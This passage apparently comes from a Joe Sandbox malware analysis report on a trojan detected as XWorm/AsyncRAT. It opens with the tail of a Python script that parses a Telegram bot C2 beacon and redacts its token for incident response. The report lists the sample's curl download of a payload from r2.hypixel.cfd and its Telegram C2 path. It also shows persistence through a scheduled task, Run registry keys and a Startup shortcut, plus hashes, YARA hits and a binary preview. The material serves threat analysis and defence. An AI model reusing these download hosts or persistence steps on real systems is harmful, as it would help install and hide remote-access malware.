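        "bot_token": token, "method": method, "chat_id": chat_id,
        "family": family, "version": version, "client_id": client_id,
        "fields": {k: v for k, v in fields.items() if not is_id(k)},
    }


def redact_token(token, keep=4):
    """Mask a bot token for sharing in a report while keeping a recognisable prefix."""
    return token[:keep] + "*" * max(0, len(token) - keep)


if __name__ == "__main__":
    beacon = parse_telegram_beacon(BEACON_URL)
    print("token  :", redact_token(beacon["bot_token"]))
    print("chat_id:", beacon["chat_id"], "| client:", beacon["client_id"])
    for k, v in beacon["fields"].items():
        print(f"  {k:10} {v}")
```

The useful outputs for response are the token (report it to Telegram and block the exact /bot<token>/ path prefix, since blocking api.telegram.org outright is rarely acceptable), the chat_id (pivot value across other samples from the same operator), and the client ID, which lets you correlate this host against other beacons in proxy logs.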
Name | Source | Malicious | Antivirus Detection | Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1& | svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr | false | | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://r2.hypixel.cfd/svchost.exe( | curl.exe, 00000004.00000002.1273183923.0000016CB93CB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000005.00000003.1364326636.00000135A5675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000005.00000003.1364653557.00000135A5647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t | svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://r2.hypixel.cfd/svchost.exe-oC: | curl.exe, 00000004.00000002.1273129101.0000016CB9390000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north= | svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 00000005.00000002.1365183174.00000135A5613000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
172.66.0.158 | r2.hypixel.cfd | United States | 13335 | CLOUDFLARENETUS | true
104.198.168.179 | unknown | United States | 15169 | GOOGLEUS | false
                                                                                                                IP
                                                                                                                127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561587
Start date and time: 2024-11-23 21:02:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 18sFhgSyVK.exe
renamed because original name is a hash value
Original Sample Name: 22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@30/6@4/5
EGA Information:
• Successful, ratio: 22.2%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 96
• Number of non-executed functions: 19
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 40.81.94.65
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target svchost.exe, PID 2324 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 5860 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7208 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7432 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7588 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7668 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 8136 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 18sFhgSyVK.exe
Time | Type | Description
15:03:12 | API Interceptor | 9513985x Sleep call for process: StartMenuExperienceHost.exe modified
16:39:30 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
16:39:45 | API Interceptor | 8865x Sleep call for process: conhost.exe modified
21:03:12 | Task Scheduler | Run new task: svchost path: C:\Users\user~1\AppData\Local\Temp\svchost.exe
21:03:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user~1\AppData\Local\Temp\svchost.exe
21:03:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user~1\AppData\Local\Temp\svchost.exe
22:38:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | UH7iNNKgPW.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | cmd.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | ip-api.com/json/
208.95.112.1 | Wire slip account payable.pif.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | ip-api.com/line/
208.95.112.1 | file.exe | malicious | JasonRAT | ip-api.com/json/?fields=11827
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
 | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
 | cmd.exe | malicious | Blank Grabber | 208.95.112.1
 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
 | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
 | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | 208.95.112.1
api.telegram.org | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
 | file.exe | malicious | Unknown | 149.154.167.220
 | sosoliso.exe | malicious | MassLogger RAT | 149.154.167.220
 | file.exe | malicious | Amadey, XWorm | 149.154.167.220
 | file.exe | malicious | XWorm | 149.154.167.220
 | file.exe | malicious | Unknown | 149.154.167.220
 | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
 | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
 | order requirements CIF-TRC809945210.exe | malicious | GuLoader | 149.154.167.220
 | Updated Invoice_0755404645-2024_pdf.exe | malicious | Unknown | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | 21Installer.exe | malicious | Stealc, Vidar | 149.154.167.99
 | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
 | file.exe | malicious | Unknown | 149.154.167.220
 | sosoliso.exe | malicious | MassLogger RAT | 149.154.167.220
 | file.exe | malicious | Amadey, XWorm | 149.154.167.220
 | file.exe | malicious | XWorm | 149.154.167.220
 | file.exe | malicious | Unknown | 149.154.167.220
 | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
 | bZPAo2e2Pv.jar | malicious | Can Stealer | 149.154.167.220
 | S0FTWARE.exe | malicious | Stealc, Vidar | 149.154.167.99
CLOUDFLARENETUS | kwlYObMOSn.exe | malicious | XWorm | 104.20.22.46
 | https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub | malicious | Unknown | 104.17.25.14
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.33.116
 | file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
 | file.exe | malicious | LummaC Stealer | 104.21.33.116
 | cmd.exe | malicious | Blank Grabber | 162.159.128.233
 | http://elizgallery.com/js.php | malicious | Unknown | 172.64.41.3
 | https://elizgallery.com/nazvanie.js | malicious | Unknown | 104.22.0.204
 | file.exe | malicious | LummaC Stealer | 172.67.162.84
 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 172.67.162.84
TUT-ASUS | UH7iNNKgPW.exe | malicious | XWorm | 208.95.112.1
 | 18fvs4AVae.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
 | cmd.exe | malicious | Blank Grabber | 208.95.112.1
 | z81zEuzkJPHHV3KYua.exe | malicious | AgentTesla | 208.95.112.1
 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Listing_error_15_code_file-002.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | NeftPaymentError_details__Emdtd22102024_jpg.jar | malicious | Caesium Obfuscator, STRRAT | 208.95.112.1
 | Wire slip account payable.pif.exe | malicious | AgentTesla | 208.95.112.1
 | http://christians-google-sh-97m2.glide.page/dl/d0a5f4 | malicious | Unknown | 208.95.112.2
 | HnJdZm51Xl.exe | malicious | Amadey, Clipboard Hijacker | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | KEFttAEb.vbs | malicious | PureCrypter | 172.66.0.158
 | hkQx7f6zzw.exe | malicious | TVrat | 172.66.0.158
 | hkQx7f6zzw.exe | malicious | TVrat | 172.66.0.158
 | reservation .exe | malicious | TVrat | 172.66.0.158
 | oZ3vtWXObB.exe | malicious | TVrat | 172.66.0.158
 | aeyh21MAtA.exe | malicious | TVrat | 172.66.0.158
 | wjpP1EOX0L.exe | malicious | TVrat | 172.66.0.158
 | PkWnPA8l7C.exe | malicious | DBatLoader, TVrat | 172.66.0.158
 | oZ3vtWXObB.exe | malicious | TVrat | 172.66.0.158
 | aeyh21MAtA.exe | malicious | TVrat | 172.66.0.158
3b5074b1b5d032e5620f69f9f700ff0e | kwlYObMOSn.exe | malicious | XWorm | 149.154.167.220
 | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
 | psol.txt.ps1 | malicious | LummaC | 149.154.167.220
 | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
 | Setup.exe | malicious | LummaC | 149.154.167.220
 | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
 | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
 | 17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe | malicious | XWorm | 149.154.167.220
 | file.exe | malicious | LummaC Stealer | 149.154.167.220
 | file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
                                                                                                                No context
Process: C:\Users\user\AppData\Local\Temp\svchost.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
Process: C:\Windows\StartMenuExperienceHost.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 41
Entropy (8bit): 3.7195394315431693
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5: 0DB526D48DAB0E640663E4DC0EFE82BA
SHA1: 17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256: 934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512: FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious: false
                                                                                                                Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
Process: C:\Windows\StartMenuExperienceHost.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 79872
Entropy (8bit): 5.969526908188351
Encrypted: false
SSDEEP: 1536:K2Kq6qxHg+vmlFB+dbPHq0FzvoqH7fgHOkVzQOCpG:LKIxHAFcdbPJHsHOvhG
MD5: 9D9D23A73F3B3F53E8581D8BB31953C4
SHA1: EADD04F6DEF413C3987529AC88E5E69C89563852
SHA-256: 4C17F40A56758579CDC2356A9276F92CFA3ED2E56DBB89816E5EAA15CFF0E6F3
SHA-512: FCAE7AE9D0EAB656CC37469A3AAB9B5A6C14FDE68EB3DD576F8BA8C7DC24FCAF7C8140C5D565E843FBD9A482F29D37A3093B7C95717924A4AA11F3B0704B7622
Malicious: true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!.@g............................^M... ...`....@.. ....................................@..................................M..K....`............................................................................... ............... ..H............text...d-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................@M......H.......,h..........&.....................................................(....*.r...p*. W.R.*..(....*.r!..p*. ...*.s.........s.........s.........s.........*.rA..p*. ....*.ra..p*. /...*.r...p*. .O..*.r...p*. ..J.*.r...p*. ..'.*..((...*.r...p*. S...*.r...p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(^...*"(....+.*"(....+.*&(7...&+.*.+5sl... .... .'..om...(,...~....-.(b...(T...~....on...&.-.*.r0..p*. ....*.rP..p*. ....*.rp..p*. 5...*.r...p*.rG..p*. ..e.*.r...p*. .(T.*.r
Process: C:\Windows\StartMenuExperienceHost.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 23 19:03:11 2024, mtime=Sat Nov 23 19:03:12 2024, atime=Sat Nov 23 19:03:11 2024, length=79872, window=hide
Category: dropped
Size (bytes): 1056
Entropy (8bit): 5.018080230260477
Encrypted: false
